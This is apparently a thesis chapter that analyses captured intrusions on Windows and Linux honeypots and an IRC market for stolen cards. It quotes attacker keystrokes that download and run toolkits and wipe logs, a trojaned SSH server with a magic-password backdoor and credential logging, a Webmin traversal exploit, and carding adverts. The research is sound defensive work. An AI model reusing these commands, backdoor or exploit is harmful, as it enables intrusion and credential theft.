PHP-based trojan backdoor c99 shell that
comprises a significant
amount of file as well
as system manipulation
34e47e3d7711889e4abe5d64d153eda2
functions. The shell is
run to install a number of
system services, including
the FTP server described
below.
Server component and
initialization file of the
Serv-U
FTP
Server.
e7c177b23210819b4a9087343351e045,
With the help of the
b7b4cce7b902a9c735c27c9b22054c56
server, further utilities
are transferred to the
honeypot.
118
Attack Tool
MD5 Checksum
bw1.exe
31924ef0ae98f9cf7884d41d91499751
ts.bat
64f1bb47710b59ccc03efa1c09d355c3
tbl_index.php 4959954f89270ef01979029d180ee3c5
1.bat
6a48b5bfa1a60f4620077acd253ba245
install.cmd,
lsasvc.exe,
lsasvc.ini
906590f18a9065b055d52f779e1dc220,
29d6dfbb62cb51674f4b6d00976e5288,
68b19fe27a6aea5519f2519a6ee3658a
on.dll,
off.dll,
dir.dll
4b61fae8269e6875189b681446a645c0,
7f538611e5ee85211a1a979d2dd94a5b,
2012dd7c39441d80a684ed4d45f07c0f
Description
Speed test utility that
measures the bandwidth
of the Internet connection. Thereby, the adversary is able to assess the
value of the compromised
machine.
Batch script that enables
the Microsoft Terminal
Service in order to provide the intruder with a
graphical remote user interface.
Obfuscated version of the
c99 shell which is set up
to maintain access to the
system.
Batch script that deletes
various core components
of
the
phpMyAdmin
database
management
system to harden the
machine against further
attacks.
Setup and program files
of the Hacker Defender
rootkit. The rootkit subverts the operating system and helps conceal the
incident.
Supplemental files for the
Serv-U FTP server that
provide auxiliary function, e.g., displaying custom banners or status information about the service.
Table 5.8: Attack Tools Used During the Compromise of the Windows Honeypot
119
Figure 5.23: Timeline of the Attack on the Windows Honeypot
120
5.3.1.2 Evaluation of the Attack
Due to a poorly configured instance of the phpMyAdmin database administration program, the attacker is able to easily gain administrative privileges and upload her own
tools. These tools include a trojan backdoor that permits manipulating the entire machine over the Internet as well as a rootkit that is capable of subverting the operating
system in order to conceal the incident. In the next step, the intruder sets up a file
transfer server and begins to store several audio and video files. We assume these files
are to be made available for software pirates. This assumption is based on the following
findings: First, the FTP server is configured to grant access to numerous users, e.g.,
to the user fill0r, but also to various so-called leeches. A fill0r27 is responsible for “filling” an exploited host with applications, movies, or other types of media, while leeches
typically consume the stored material only and do not share their own contents (see
“B-Bstf” Smith, 2004). Second, the server keeps track of the data that is transferred
to and from the decoy and displays detailed usage statistics. Third and last, users are
explicitly invited to “squeeze out every bit” of the machine28 .
Taking the different aspects into consideration, we expect our honeypot is to be turned
into a so-called public stro (or pubstro in short), i.e., a compromised high-capacity public
server that is misused to distribute illegal copies of copyright-protected goods (see “BBstf” Smith, 2004, p. 29). In many cases, such a pubstro is integrated into a larger
network of similarly penetrated systems and is run by participants of a special Internet
subgroup which is known as the warez scene (see Sen and Krömer, 2008; Craig and
Burnett, 2005). For this reason, it is beneficial to analyze the incident not only with
regard to the intruder, but also with respect to said subgroup. Thereby, we can possibly
assess the intentions and motives of the adversary more accurately and create a more
detailed profile of her personality.
5.3.1.3 Profile of the Attacker
Based on the pieces of evidence we collected on the compromised decoy, we are able to
draw conclusions about the presumable origin and technical expertise of the attacker.
Especially an evaluation of the latter characteristics can greatly facilitate a broad classification of the intruder (cmp. Rogers, 2000a; Hollinger, 1988). For a more reasonable
taxonomy, however, we need to take motivation-related factors into account as well (cmp.
Chantler, 1995; Rogers, 2005). These factors can be grouped into six categories that are
outlined in the second half of this section.
Presumable origin of the attacker: Surprisingly, only two systems are used by the
blackhat during the intrusion to gain access to our honeypot. The respective hosts with
27
Note: This is a jargon word for “filler”. Substituting letters for numbers is common in certain
subgroups of the Internet community and known as leetspeak. For more information, please refer to
Raymond (2003).
28
Note: This is a figurative translation of the greeting message of the captured login banner.
121
the IP addresses 87.230.xxx.xxx and 85.176.xxx.xxx are traced to two different German
Internet service providers (ISPs). A number of further indices also signify that the
intruder is likely to originate from Germany. For instance, both the greeting message
that is displayed when logging in to the Serv-U FTP server as well as several passwords
that we intercepted at the beginning of a FTP session are composed in German. The
user-agent strings that are transmitted by the attacking machine to our decoy each time
a web site is retrieved contain the German country code as shown in the extract of a
captured network packet below.
Mozilla /5.0 ( Windows ; U ; Windows NT 5.1; de ; rv :1.8.1.12)
Gecko /20080201 Firefox /2.0.0.12
As can be seen, we are also able to identify the system platform of the adversary by
analyzing the different sections of the string (see also Mozilla Developer Center, 2009;
Microsoft Corporation, 2009, for an overview about the sections of the user-agent string).
In our case, the intruder uses a Microsoft Windows operating system and a recent version
of the Mozilla Firefox Internet browser.
It is important to note though that these pieces of information are under entire control
of the client and, thus, may possibly be tampered with (see Andrews and Whittaker,
2006). Additionally, the individual IP addresses that are recorded during the incident
do not necessarily reflect the real origins of the attack either. As many authors point
out, attackers frequently abuse intermediary machines, so-called proxies, to cover their
tracks and circumvent prosecution (cmp. Honeynet Project, 2004b). Therefore, each
source of data must generally be regarded with great care. By combining and linking
the captured elements, however, we are able to draw a more complete picture and find
a solid foundation for our hypothesis.
Presumable expertise of the attacker: Within a period of slightly more than 15 minutes,
the blackhat exploits a vulnerability in one of our applications, penetrates the machine,
and sets up her own FTP server. Taking these step-by-step actions into account, we
conclude the intrusion has been well planned and prepared for. Furthermore, given that
the adversary is familiar with a number of attack tools and is quickly able to upload
a customized login banner, we have reason to believe she has already gained a certain
experience with similar system compromises. On the other hand, she does not seem to
fully understand the complexity of specific utilities, most importantly, the rootkit that is
installed on our decoy but which is quite poorly configured (cmp. Section 5.3.1.1). Some
operations are also carried out repetitively, e.g., the Serv-U daemon is added multiple
times to the exception list of the local firewall rules. It also remains unclear why two
variants of the same trojan backdoor are transferred to our honeypot. In summary,
even though the strategy and methods of the intruder are fairly efficient, we assume her
technical expertise and skills are only rather low.
Presumable motivations of the attacker: As members of the Honeynet Project (2004b)
note, identifying the motivations of attackers is key to gaining a deep understanding
122
of their behavior. In turn, by observing the activities of intruders, we are able to
draw conclusions about their intentions and reveal inherent factors such as motives
and attitudes (see Fishbein and Ajzen, 1975; Ajzen, 1991, for an overview about the
interrelation between motivations, attitudes, and behavior).
With respect to computer crime, the social psychologist Max Kilger differentiates the
following six prevalent motivations that are subsumed under the acronym MEECES (see
Honeynet Project, 2004b, p. 509-520): money, entertainment, ego, cause (i.e., ideology),
entrance to social group, and status.
After examining the sequence of the attack, we did not find any evidence the incident
was monetary- or ideology-driven. Furthermore, considering the adversary attempted
to “keep a low profile” and made significant efforts to stay in control of the machine,
we feel the compromise was not carried out purely for entertainment purposes. On the
other hand, the fact that a personal logo was uploaded to our honeypot and the system
was being made available to multiple users indicate a certain desire for appreciation and
the need to rise in esteem as well as status. This observation is supported by Rogers
(2000b, p. 19): “The reinforcement derived from hacking may come from the increase in
knowledge, prestige within the hacking community, or the successful completion of the
puzzle (...)”. Consistently, Jordan and Taylor (1998, p. 768) argue that “peer recognition
from other hackers or friends is a reward and goal for many hackers, signifying acceptance
into the community and offering places in a hierarchy of more advanced hackers”.
To sum up, ego-, social-, and status-related elements apparently were the dominant
motivational drivers for the blackhat to penetrate our decoy, rather than monetary or
ideological factors.
5.3.1.4 Taxonomy and Classification of the Attacker
A number of authors emphasize that “hackers” do not form a homogeneous group, e.g.,
because of different social, personal, or technical backgrounds (cmp. Rogers, 2000b;
Chantler, 1995). Therefore, various attempts have been made in the literature to divide
computer criminals into meaningful categories (cmp. Hollinger, 1988; Cross and Shinder, 2008). This categorization is a “necessary first step toward understanding these
individuals” (see Rogers, 2001, p. 48). To a great extent, however, the results of these
researches are quite dated at the time of this writing, mainly qualitative in nature, and
cannot be regarded as entirely representative (cmp. Rogers, 2001, p. 47-61). As Rogers
(2005, p. 2) concludes, “even with the current increase in computer crime rates, there
has been a lack of empirical studies based on a solid scientific method in this area”. For
this reason, he proposes a new, two dimensional framework and distinguishes 8 types of
attackers in dependence of their skills and motivation.
In compliance with this model, the intruder we monitored can be classified as a novice
or cyber-punk. These individuals are described as technically less competent and strongly
rely on pre-compiled toolkits in order to successfully penetrate a system. Their motivation primarily results from the rise in ego they feel when a machine is compromised as
123
well as the wish to be accepted as a legitimate part of the hacker subculture. Similar
observations are also reported by participants of the Hacker’s Profiling Project (HPP)29 ,
an international research group that strives to create empirically-valid profiles for computer crimes (see also Chiesa et al., 2009). According to their experiences, these types
of blackhats are typically organized within some kind of group and scan the Internet
for specific vulnerabilities. Once a vulnerability is found, the respective computer is
exploited with the help of tools and simple scripts and is used for the purposes of the
adversary.
5.3.2 Attack on the Linux Honeypot
Our Fedora-based Linux honeypot was compromised after having been online for about
six weeks. The sequence of the intrusion is illustrated in the following section. Similar
to the attack presented in the previous section, we conclude with a short evaluation of
the incidents and briefly outline the alleged motives and characteristics of the intruder.
5.3.2.1 Sequence of the Attack
In the early morning of April 16, at 03:42:42 a.m., the monitoring devices of our Honeywall detect the beginning of an automated password brute force attack. The probes
originate from a machine with the IP address 192.104.xxx.xxx and target the secure shell
server of our Fedora-based Linux honeypot. Within a period of less than 25 minutes,
the weakly-protected root superuser account is compromised, and valid authentication
credentials are found.
More than two hours later, at 6:15:46 a.m., an adversary initiates an encrypted connection from the IP address 85.18.xxx.xxx and logs in for the first time. Although the
network channel is secured, we are able to accurately reconstruct the activities of the
intruder with the help of Sebek that is running on our decoy. An extract of the captured
keystrokes is shown in Listing 5.8. The individual steps of the attacker are described in
more detail below.
First, the blackhat disables the history functionality of the shell. The shell history is a
standard feature of the bash command interpreter and keeps track of all instructions that
are typed in over the system console for the convenience of the user (cmp. GNU Free
Software Foundation, 2009). Its behavior is controlled by several environment variables.
For instance, the variable HISTFILE defines the name of the file the history is written
to. If this variable is “unset” (cmp. Line 1 of Listing 5.8), the logging mechanism of the
shell is turned off, and commands are not persistently saved any longer (cmp. Ithilgore,
2008). To make sure the operation is carried out successfully, the attacker is careful to
delete potential aliases of the variable such as HISTSAVE or HISTLOG as well.
29
see http://hpp.recursiva.org/en/index.php
124
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[06:16:10] unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY
HISTLOG USERHST REMOTEHOST REMOTEUSER ;
wget <... >/ m . tar . gz ; tar - xzvf m . tar . gz ;
[06:16:12] rm - rf m . tar . gz ; chmod + x m ; ./ m -u root -n 1;
rm - rf m
[06:16:14] w
[06:16:51] wget <... >/ backdoor ; tar zxvf backdoor ;
rm - rf backdoor ; cd . ssh ;
[06:18:12] ./ install
[06:24:59] w
[06:25:25] wget <... >/ scan / scanner2 ; tar zxvf scanner2 ;
rm - rf scanner2 ; cd scan ;./ go . sh 71
[06:25:31] cd ..
[06:25:37] rm - rf . ssh
[06:25:49] w
[06:26:05] rm - rf scan
[06:26:44] w
[06:26:46] uname -a
[06:26:54] / sbin / ifconfig
Listing 5.8: Extract of Keystrokes Captured by Sebek
In the next step, the adversary starts downloading a compressed archive from a public Internet domain30 . This archive contains a single binary m which is identified as the
MIG Logcleaner31 , version 2.0. As the name suggests, the program is capable of erasing specific entries in the main Linux log files /var/log/utmp, /var/log/wtmp/, and
/var/log/lastlog. At 06:16:11 a.m., the application is invoked with the parameters
-u root and -n 1 (cmp. Line 4 of Listing 5.8) to remove all traces of the unauthorized
superuser access.
In addition to the log cleaner, the intruder also retrieves two archives from a private
website with the IP address 209.63.xxx.xxx (see Line 7 and Line 11). The first archive
contains a manipulated version of a secure shell server and is extracted to the hidden
directory .ssh. At 06:18:12 a.m., the server is compiled and set up with a custom
installation script that is displayed in Listing 5.9. Thereby, our own service on the
machine is replaced. What is more interesting, the syslog daemon of the operating
system is temporarily shut down during this process to prevent suspicious records of
these activities in the log files.
The file dm.h that is referenced in the installation script is not part of the original SSH
software. After a short examination of the respective source code, we discover a secret
trojan backdoor. The algorithm for this backdoor is outlined in Listing 5.10. As can be
seen on Line 6, the verification routine of the service is completely circumvented in case
30
Note: The Internet address of the domain has been sanitized to protect the privacy of the involved
parties.
31
see http://pc-freak.eu/sploits/info/download.txt
125
1
#! / b i n / s h
2
3
4
# edit the configuration
pico dm . h
file
of the trojaned service
5
6
7
# c o n f i g u r e , c o m p i l e , and i n s t a l l t h e t r o j a n e d s e r v i c e
...
8
9
10
11
# o v e r w r i t e t h e o r i g i n a l daemon
cp -f ./ sshd / usr / sbin / sshd
cp -f ./ sshd / usr / local / sbin / sshd
12
13
14
15
16
17
# s t o p t h e o r i g i n a l i n s t a n c e o f t h e s e r v i c e and s t a r t t h e t r o j a n
kill -9 ‘ cat / var / run / sshd . pid ‘
/ sbin / service syslog stop
/ usr / sbin / sshd
/ sbin / service syslog start
Listing 5.9: Setup Script of a Trojaned Secure Shell Server
1
2
int sys_auth_passwd ( Authctxt * authctxt , const char * password ) {
...
3
// g r a n t a c c e s s a t a l l t i m e s i f t h e magic p a s s w o r d i s e n t e r e d
if (( strcmp ( password , MAGIC_PASS ) ) == 0) {
dm = 1;
return 1;
}
else {
dm = 0;
4
5
6
7
8
9
10
11
// l o g a u t h e n t i c a t i o n c r e d e n t i a l s
fd = fopen ( LOGFILE , " a " ) ;
fprintf ( fd , " % s :% s \ n " , authctxt - > user , password ) ;
fclose ( fd ) ;
12
13
14
15
16
// c h e c k w h e t h e r t h e u s e r h a s e n t e r e d a c o r r e c t p a s s w o r d
return ( strcmp ( encrypted_password , pw_password ) == 0) ;
17
18
}
19
20
}
Listing 5.10: Backdoor Mechanism Implemented in the Secure Shell Server
126
a magic password is entered. Consequently, access to the system may be maintained
even if the intrusion is detected and the superuser password is changed at a later point
of time. On the other hand, if a legitimate user tries to log in, her credentials are
transparently written to a special log file that is controlled by the attacker, before the
original password checking function is called (see Line 15 and Line 20). These pieces of
information can possibly be used to attack further machines on the network.
The second archive that is downloaded from the private website contains a network
scanner and a simple password brute force utility. These tools are coordinated by a
small auxiliary script. It is executed at 06:25:25 a.m. in order to probe an entire class A
network for vulnerable systems (cmp. Line 12 of Listing 5.8). However, these outbound
connections are blocked by our Honeywall to mitigate risks as best as possible.
Before logging out, the adversary covers her tracks and deletes all files that have been
transferred to the honeypot during the intrusion. Furthermore, she briefly runs the
uname command to obtain basic information about the operating system and checks the
configuration of the network interface cards. At 06:27:08 a.m., the connection is closed.
April 17
The attacker returns on the following day at 06:45:14 p.m. In contrast to the preceding
session, the blackhat does not clean the log files but solely invokes the w command to
verify no other users are currently logged in on the machine. In the next step, the
psyBNC32 IRC bouncer is retrieved from a private website and saved to a newly-created
hidden directory. An IRC bouncer acts as an intermediary between an IRC (Internet
Relay Channel) server and a corresponding client. Thereby, it is, for instance, possible
to maintain a connection with a certain communication channel, even if the client exits
at a specific point of time (cmp. Jestrix, 2003). As we will see later, this characteristic
is extremely beneficial to the intruder.
Before the application is executed, the adversary manipulates the IPTables packet
filtering software and adds a new rule:
/ sbin / iptables -I INPUT -p tcp -- dport 8080 -j ACCEPT
According to this rule, incoming TCP requests that are destined for port 8080 are to
be accepted. It is required by the bouncer to properly process inbound traffic.
At 06:46:22 p.m., psyBNC is finally run and starts working. In order to appear as
inconspicuous as possible, the main executable has been renamed to httpd and, thus, is
disguised as an instance of the httpd web server.
32
see http://www.psybnc.at/
127
April 18
On April 18, a new encrypted network session is established with our decoy at 09:17:14
in the morning. The intruder quickly checks the list of users that are currently logged
in and begins to download a compressed archive from a web server with the IP address
85.204.xxx.xxx. The archive contains multiple tools and scripts that can be used to
scan hosts for instances of the Webmin33 and Usermin34 web applications. These applications provide graphical interfaces for basic administrative tasks (see Cameron, 2003).
Versions prior to 1.290 and 1.220, respectively, do not properly sanitize user-specific input. Thereby, attackers are able to access arbitrary files on the system of the victim (see
SecurityFocus, 2006d; CVE, 2006a). These security weaknesses may be automatically
exploited with a number of utilities that are included in the archive as well. To make the
procedure as easy as possible, a small helper script coordinates the interactions between
the different components. A flowchart of the activities is displayed in Figure 5.24.
To initiate the attack sequence, an adversary simply needs to invoke the script go with
the address of a class B network. This information is passed to ss, a simple network
scanner that is identified as the Fast SYN Scanner by DrBIOS35 . The program sends
two TCP synchronize (SYN) packets to each machine within the selected network range,
more precisely, to the system ports 10,000 and 20,000 the Webmin and Usermin web
applications listen on (see Cameron, 2003). If a packet is acknowledged, an active service
has been found, and the IP address of the host is logged.
At the end of the operation, the generated log file is processed by the scripts start,
do, and mycnf that check whether systems in the selected network segment are affected
by the vulnerability. If this is the case, the individual servers are attacked for the first
time, and the /etc/passwd file of the victim is retrieved in order to extract the list of
valid system users. For this purpose, a small Perl program a.pl must be executed. It
stores the actual exploit code that is illustrated in Listing 5.11.
The malicious directory traversal technique shown in Line 6 and 9 of Listing 5.11 is
used during a second attack to disclose further resources, including the /etc/shadow file
that saves hashes of the system passwords, various configuration files, and the command
histories of the users.
In the last step, the captured shadow file is read in by john, a popular password
cracking program36 , to start a brute force or dictionary attack on the encrypted authentication credentials. If this attack succeeds, control over additional machines may
be gained. For this reason, the adversary intends to probe both a single system with
the IP address 65.165.xxx.xxx as well as an entire network of a Belgian Internet service
provider. However, even though all utilities described above are fully functional, these
attempts remain unsuccessful, because the intruder fails to replace a hard-coded name
33
see
see
35
see
36
see
34
http://www.webmin.com/
http://www.webmin.com/usermin.html
http://www.securiteam.com/tools/5EP0B0ADFO.html
http://www.openwall.com/john/
128
Figure 5.24: Flowchart Diagram of the Captured Attack Tools
129
1
#! / u s r / b i n / p e r l
2
3
4
5
6
7
8
9
10
...
# generate a s e r i e s of . . / i n s t r u c t i o n s to break out of the root
# d i r e c t o r y o f t h e web s e r v e r
$temp = " /..%01 " x 80;
...
# e x p l o i t the f i l e disclosure v u l n e r a b i l i t y
my $url = " http :// " . $target . " : " . $port . " / unauthenticated / " . $temp .
$filename ;
11
12
13
# retrieve the f i l e
$content = get $url ;
Listing 5.11: Exploit for the Webmin and Usermin Web Applications
for the network interface card (eth1) with the correct, system-specific value (eth0). As
a result, the scanning process is aborted, and no outbound connections are established.
Being obviously dissatisfied with the results, the blackhat deletes the complete toolkit
and logs out at 09:27:21 a.m.
About two hours later, at 11:16:01 a.m., the attacker returns and downloads an archive
with the eggdrop software37 from a FTP server with the IP address 58.254.xxx.xxx.
Eggdrop provides numerous so-called bot functions for an IRC server. It is, for instance,
capable of automatically monitoring specific communication channels and serving requests (cmp. Pointer, 1997).
After extracting the program into the home directory of a non-privileged user, the
intruder retrieves a required static library and briefly edits several configuration files.
At 11:30:56 a.m., the bot is executed and joins the IRC network.
With the help of psyBNC that is installed on our honeypot, the adversary is able to
reconfigure the eggdrop application at all times. Furthermore, when participating in
an IRC communication channel, solely the IP address of our machine is revealed (cmp.
Jestrix, 2003). Thus, the real identity of the attacker may be effectively concealed. On
the other hand, due to the devices running on our Honeywall, we are also able to monitor
a great part of the activities the blackhat is involved in. An analysis of these activities is
subject of Section 5.4, an evaluation of the attack as well as a description of the alleged
motives and characteristics of the intruder are presented below.
5.3.2.2 Evaluation of the Attack
The adversary launches an automated password brute force attack on our honeypot and
succeeds in compromising the weakly protected root superuser account of the operating
system. After logging in and carefully covering her traces, the intruder retrieves several
37
see http://www.eggheads.org/
130
archives from different servers on the Internet. These archives comprise a trojaned
version of a SSH server that is installed on our decoy to secretly record usernames and
passwords, a network scanner, and multiple attack tools and scripts. Although the
blackhat attempts to probe several external networks, the respective systems are not
put at risk at any time due to the protection mechanisms of our Honeywall.
However, the attacker manages to set up a bouncer software as well as a so-called bot
for the IRC network on our machine. As we will see in Section 5.4, these programs help
the blackhat administrate a covert communication channel and participate in some type
of underground economy.
A brief description of the individual files and archives we have captured during the
intrusion can be found in Table 5.9, an overview about the entire incident is given in
Figure 5.25.
Attack Tool
m
backdoor
ss
MD5 Checksum
Description
Log cleaning utility MIG
Logcleaner 2.0 that is
used by the adversary
9b0e266c08e8983f0c3e42a12bece88c
to manipulate the system
log files and cover the
traces of the intrusion.
Trojaned version of the
secure shell server. After the service is installed
on the honeypot, the adversary may grant access
to the system by entering
df192b169644892a7d85064d9c5b2f41
a magic password. Additionally, the authentication credentials of legitimate users are transparently written to a secret
file when logging in.
Network scanner DrBIOS
Fast SYN Scanner. The
tool is capable of probb51a52c9c82bb4401659b4c17c60f89f
ing system ports of a large
number of systems within
a short amount of time.
131
Compressed archive that
contains the source code
files of the psybnc IRC
bouncer. With the help
of the bouncer, the adverpsybnc
54a6d04d4605f251d4caf6dc76af39d0
sary is able to join communication channels on
the IRC network without
revealing her real IP address and identity.
Archive that stores 14
attack tools and scripts
to probe servers for vulnerable instances of the
Webmin or Usermin web
applications.
In case
a security weakness is
olinie.tar.gz a5712fbed957d4ae9d0c6cdd93ec4d7b
found, the respective machines are automatically
exploited, and sensitive
information such as usernames and passwords are
transferred to the attacking host.
Source code archive of
the eggdrop bot software. The program proeggdrop
99c1b3bdf7297e764030aeadfb05b1df vides various automatic
monitoring and administrative functions for IRC
communication channels.
Table 5.9: Attack Tools Used During the Compromise of the Linux Honeypot
132
Figure 5.25: Timeline of the Attack on the Linux Honeypot
133
5.3.2.3 Profile of the Attacker
Similar to the attack on our Windows honeypot, we attempt to create a basic profile of
the adversary based on the pieces of evidence we collected and draw conclusions about
her origin, her technical expertise, and her motivations. A more detailed taxonomy and
classification of the intruder is subject of Section 5.3.2.4.
Presumable origin of the attacker: In sum, six systems are involved in the incident
that are scattered over three continents: The password brute force attacks are traced to
a server in North America. On the other hand, all encrypted connections are initiated
from a computer located in Italy. Last but not least, the additional software applications
and archives that are downloaded to our decoy during the intrusion are stored on four
different machines in the United States, China, and Romania.
Taking these aspects into consideration, we have reason to believe the blackhat intentionally obscures the source of her attack. Thus, the geographical location of a host
does not necessarily imply the real origin of the intruder. However, after a more in-depth
investigation of the compromise, we find two indices the adversary is Romanian or of
Romanian descent: First, a great part of the attack tools and scripts that are transferred
to our honeypot contain Romanian messages and instructions.38 Second, the attacker
joins several private communication channels on the IRC network and chats in Romanian
before finally joining an English-speaking underground market (see Section 5.4).
Presumable expertise of the attacker: On the one hand, the adversary appears to have
a certain experience with Linux-based intrusions. With the help of multiple pre-packaged
archives, our decoy gets quickly penetrated and under full control of the blackhat. She
makes also sure to cover her traces and restrains most of her stays to short periods of
less than 15 minutes. On the other hand, the intruder is unable to properly operate
some of the attack tools that are downloaded to our machine and fails to specify correct
program variables. As a consequence, several attempts to probe external networks for
vulnerabilities repetitively go amiss. Moreover, processes that are executed on the system are not effectively hidden from administrators or other maintenance personnel, e.g.,
by installing a rootkit as has been done in the compromise of the Windows-based honeypot. That is why we presume the technical expertise of the attacker is quite limited
and restricted to a number of step-by-step activities.
Presumable motivations of the attacker: With the help of the MEECES model that
we have briefly introduced in Section 5.3.1.3, we attempt to identify the prevalent motivations of the adversary that eventually led to the incident.
In contrast to the attack on our Windows-based honeypot, we did not find any evidence
the intrusion was ego- or sociologically-driven, i.e., the compromise was neither carried
out solely for confidence-related reasons, nor for gaining entrance to a social group or
enhancing status. Additionally, we did not find any messages, logos, or other types of
personal statements that indicate a political or ideologic motivation. Given the intruder
made sure to cover her traces, subverted a system daemon, and systematically tried to
38
Thanks to Viviana Nichica for translating the messages.
134
probe external network segments for vulnerabilities, we believe the attack has a serious
intention and must not be regarded as purely playful, i.e., for entertainment purposes. In
fact, our system acts as an intermediary for joining a covert communication channel. As
we will see in Section 5.4, various hacking-related goods and services such as stolen credit
cards or access to compromised online accounts are advertised for sale in this channel.
For this reason, we conclude the attacker strives for taking monetary advantages from
the intrusion in the end.
5.3.2.4 Taxonomy and Classification of the Attacker
Based on the technical expertise and the motivational drivers we have identified in the
previous section, we attempt to categorize the attacker in compliance with the twodimensional taxonomy framework developed by Rogers (2005) (cmp. Section 5.3.1.4).
As we have outlined, a meaningful and empirically valid classification helps “arrive at
some type of understanding about the motivation of individuals engaged in hacking”
and overcome the hurdles researchers face when studying miscreants (see Rogers, 2000a,
p. 1-2).
According to the framework, we classify the intruder we have observed as a petty thief.
As Rogers (2005, p. 4) points out, these types of computer criminals are motivated by
financial gain and greed. They “learn the prerequisite skills necessary to perpetrate the
crime”, as ”the successful use of technology is crucial in order for them to fulfill their
need for money”. Due to these characteristics, petty thieves may become skilled over
time even if they appear to be technically less proficient at first and, thus, represent a
serious threat (cmp. Liu and Cheng, 2009).
5.4 Analysis of an Underground Communication
Channel
As we have outlined in the previous section, an adversary managed to set up a so-called
bouncer and an IRC bot after successfully breaking in our Fedora-based Linux honeypot.
With the help of these applications, the intruder was able to uphold a permanent connection with the Internet Relay Chat network as well as automatically perform certain
administrative tasks within a specific underground communication channel. These tasks
included generating access rules for other channel members and providing basic usage
statistics. In cooperation with two additional bots that were already residing in the
channel, the attacker could thus effectively stay in control over the room.
With the help of the Honeywall, we were able to monitor a great part of the activities
over a period of about 10 weeks, from April 20, 2008 to June 30, 2008, and revealed
some form of underground market for hacking-related goods and services. An overview
about this market and its participants is presented in the following section.
135
5.4.1 Overview about the Captured Data
During the observation period, we recorded more than 676,000 messages that were publicly exchanged between the different channel members. As shown in Figure 5.26, the
number of messages sent per day varied from about 2,700 on April 25 to more than
21,000 on May 22. On an average day, we monitored slightly less than 12,000 messages.
Equally, the number of active users in the channel as identified by their unique nickname (“nick”) differed between 18 on April 27 and 79 on May 10 (see Figure 5.27). On
average, 49 users were logged on on any given day and posted at least one message.
Figure 5.26: Number of Messages Sent per Day to the Communication Channel
To a high degree, the respective messages were repetitively sent to the channel. In
many cases, for instance, automated scripts and programs periodically retransmitted
specific, pre-defined lines of text. For this reason, we were able to reduce the total
text corpora to a comparatively small set of 4,165 unique messages, ordered by their
frequency.
To assess the recorded communication more accurately, we manually categorized and
labeled 10% (417) of the most frequent messages in the next step. Due to the characteristics of the frequency distribution of the text corpora, these messages covered 84.5%
of all captured posts. The results of our analysis are outlined in the next section.
136
Figure 5.27: Number of Active Users per Day in the Communication Channel
5.4.2 Analysis of the Labeled Data
The 417 chosen messages were identified as either advertisements for various hackingrelated goods and services, corresponding requests, or both. As indicated in Figure 5.28,
offers comprised about three quarters of the data set and outnumbered requests almost
five to one. In order to thoroughly classify the different samples, we assigned each message to one or more non-mutually distinctive categories that can be seen in Figure 5.29.
For instance, the message shown in Listing 5.12 advertises both stolen credit cards as
well as access to hacked online accounts and, thus, is assigned to two categories.
In the following, we analyze the labeled data in more detail and illustrate the individual
categories with the help of selected examples.
1
2
3
4
" Selling EU Dumps + Pin [ track1 / track2 ] ||
Paypal accounts with good balance [ verified / unverified ] ||
(...)
Dont waste my time or i will ignore you || For Deal ICQ : <xxx >"
Listing 5.12: Sample Advertisement for Hacking-Related Goods
137
Figure 5.28: Distribution of Offers and Requests for Hacking-Related Goods and Services
Figure 5.29: Types of Hacking-Related Goods and Services
138
5.4.2.1 Credit Card-Related Offers and Requests
In almost 4 out of 10 cases, adversaries posted advertisements for stolen credit cards
and credit card-related information. As McCarty (2003, p. 91) points out, the data may
either come from computer intrusions or be physically provided by morally questionable
personnel working at local banks, hotels, or restaurants. In the course of our analysis,
we have made similar observations.
Oftentimes, the information included both the personal identification number (PIN)
of the victim as well as her card verification value (CVV2). The latter is a three-digit
identification code that is frequently used for verifying the legitimacy of a credit card
during online transactions (cmp. Visa Inc., 2002). Two typical messages for such offers
that we have captured during the observation period are shown in the first two lines of
Listing 5.13. As can be seen with the second example, a blackhat advertises 30 newly
acquired (“fresh”) credit cards (“CCz”) for $200.
In contrast, we did find corresponding requests in only 13.25% of the selected data
set. Two representative sample messages are displayed in the second half of Listing 5.13.
1
2
" Selling valid fresh unused Mastercards / Visa / American Express (...) "
" Selling Fresh France CCz With Cvv2 (...) 30 ccz = 200 $ (...) "
3
4
5
" Buying all valid cc ’ s Visa or Mastercard 7 $ Each ! (...) "
" I need cvv2 From Italy , Who have privat me (...) "
Listing 5.13: Sample Advertisements and Requests for Stolen Credit Cards and Credit
Card-Related Information
5.4.2.2 Cash Out-Related Offers and Requests
As Thomas and Martin (2006) argue, one of the biggest challenges of the Internet miscreants is to safely cash the illegally obtained funds while mitigating the risk of getting
caught by law enforcement authorities at the same time. For this reason, blackhats
frequently cooperate with so-called cashiers, i.e., brokers who are willing to clean out
bank accounts of the victims. For a pre-defined, fixed fee, e.g., 50% of the total amount,
the cashier transfers the money directly to the adversary, typically within hours, by using online or offline services as offered by Western Union (WU)39 or E-Gold40 (see also
Franklin and Paxson, 2007). In many cases, additional third parties, so-called confirmers, are involved in this process as well and verify incoming payments.
Alternatively, the money may also be moved to a drop, an intermediary domestic or
offshore account, that helps impede prosecution but facilitates money laundering (cmp.
Thomas and Martin, 2006, p. 11-12). A summary of common advertisements and
requests for cashiers, confirmers, and drops can be found in Listing 5.14.
39
40
see http://www.westernunion.com/
see http://www.e-gold.com/
139
1
2
3
4
" Cashout USA Visa FULL INFO ! = 50:50% SHARE ! Legit Chaser ! (...) "
" CASHING OUT MONEYBOOKERS ACCOUNT . (10.000 $ / DAILY ) "
" Confirm Western Union ... PRV ME "
" I Got Legit U . S . A Item Drop , Split 50/50"
5
6
7
8
9
" I am looking for someone in US that can cashout pins . (...) "
" SPAMMER looking for some deals / trustable casheers . !!!"
"I ’ m looking for a WU confirmer for long term business (...) "
" Looking for a USA / Canada Drop , USA / Canada CVV Cashier (...) "
Listing 5.14: Sample Advertisements and Requests for Cashiers, Confirmers, and Drops
5.4.2.3 Further Financial Account-Related Offers and Requests
In addition to credit cards, their corresponding PINs, and CVVs, several other types
of financial account-related information were frequently offered and requested in the
underground communication channel we observed. For instance, in 12.75% of all cases,
adversaries advertised online logins for various major national and international banks,
e.g., HSBC, Halifax, the Bank of America (BOA), Chase, and Wells Fargo. Furthermore,
blackhats frequently offered access to numerous compromised online accounts, most
importantly to PayPal, an electronic money transfer service, and Amazon, the world’s
leading Internet retailer (cmp. Brohan, 2009). On the other hand, with a share of 1.75%
and 1%, respectively, requests for these goods and services were issued only marginally
(see Figure 5.29). Two sample messages for each category are illustrated in Listing 5.15.
1
2
" Selling BOA for 20 $ Hurry , Only Few to sell , Accept e - gold "
